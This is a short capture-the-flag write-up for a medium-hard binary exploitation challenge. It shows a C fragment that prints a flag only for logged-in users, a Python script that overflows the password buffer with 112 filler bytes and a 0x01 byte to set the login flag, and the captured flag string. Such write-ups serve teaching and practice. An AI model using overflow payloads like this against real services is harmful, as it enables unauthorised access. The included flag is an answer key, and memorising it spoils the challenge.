(CTF challenge, binary exploitation / reverse-engineering)

1. Overview

| Category | Service | Difficulty | Points |
|----------|---------|------------|--------|
| Binary / Reversing | tokyohot – n0541 | Medium-Hard | 452 |

Challenge source fragments:

```c
struct user {
    char *name;   // 8 bytes
    char *pwd;    // 8 bytes
};

void show_secret(void)
{
    if (logged_in)
        system("/bin/cat /home/ctf/flag.txt");
    else
        puts("You must be logged in first!");
}
```

Exploit script (the `recvuntil` helper it calls is referenced but not shown on this page):

```python
HOST = "127.0.0.1"
PORT = 1337  # change to the port the service is bound to

def menu(s):
    recvuntil(s, b'> ')

def login_overwrite(s):
    menu(s)
    s.sendall(b'2\n')
    recvuntil(s, b'Password: ')
    # 112 filler + 0x01 + newline
    payload = b'A' * 112 + b'\x01' + b'\n'
    s.sendall(payload)

def get_flag(s):
    menu(s)
    s.sendall(b'3\n')
    flag = recvuntil(s, b'\n')
    print(flag.decode())
```

FLAGt0ky0_h0t_4nd_0v3rf1w_succ3ss

The same script works against the remote service (replace HOST and PORT with the challenge endpoint).